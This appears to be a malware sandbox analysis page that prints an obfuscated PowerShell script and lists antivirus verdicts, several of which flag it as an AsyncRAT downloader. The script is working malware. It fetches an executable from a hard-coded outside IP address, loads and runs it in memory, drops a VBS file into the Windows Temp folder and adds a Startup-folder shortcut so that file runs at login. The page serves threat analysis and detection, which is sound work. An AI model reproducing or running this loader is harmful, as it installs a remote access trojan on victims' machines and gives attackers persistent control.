Static | ZeroBOX
No static analysis available.
function JkzYp-FbRq {
Add-Type -AssemblyName System.Net
return New-Object System.Net.WebClient
function WgNrT-VbDl {
$aL = @('http', '://', '88', '.', '214', '.', '48', '.', '26', '/tpnl98/', 'ret.exe')
return ($aL -join '')
function RmQce-LsXt {
$hP = @('http', '://', '88', '.', '214', '.', '48', '.', '26', '/tpnl98/', 'nums.vbs')
return ($hP -join '')
function OiqPw-YvKe {
param([string]$xU)
$qE = JkzYp-FbRq
return $qE.DownloadData($xU)
function ZdSlj-PxMv {
param([string]$rO)
$zN = JkzYp-FbRq
return $zN.DownloadString($rO)
function KxVoD-EgFt {
param([byte[]]$bK)
return [System.Reflection.Assembly]::Load($bK)
function QzHgn-TdUw {
param([System.Reflection.Assembly]$gJ)
$pL = $gJ.EntryPoint
if ($pL) {
$pL.Invoke($null, @())
function NlCvA-WsQx {
param([string]$mT, [string]$yZ)
[System.IO.File]::WriteAllText($yZ, $mT)
$kI = WgNrT-VbDl
$lE = RmQce-LsXt
$dB = OiqPw-YvKe -xU $kI
$xG = KxVoD-EgFt -bK $dB
QzHgn-TdUw -gJ $xG
$oY = ZdSlj-PxMv -rO $lE
$wJ = "C:\Windows\Temp\nums.vbs"
NlCvA-WsQx -mT $oY -yZ $wJ
$sF = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\App.url"
$vK = "[InternetShortcut]`nURL=file:///$wJ"
[System.IO.File]::WriteAllText($sF, $vK)
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX powershell.trojan.asyncrat
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
huorong Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Generic
BitDefender Trojan.GenericKD.76289507
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.76289507
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Trojan.GenericKD.76289507
TrendMicro Clean
CMC Clean
Emsisoft Trojan.GenericKD.76289507 (B)
Ikarus Trojan-Downloader.PowerShell.AsyncRAT
GData Script.Trojan.Agent.VR9C51
Jiangmin Clean
Varist Clean
Avira Clean
Antiy-AVL Trojan[Downloader]/PowerShell.AsyncRAT
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Generic.D48C15E3
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft TrojanDownloader:PowerShell/AsyncRAT.YTS!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
alibabacloud Clean
No IRMA results available.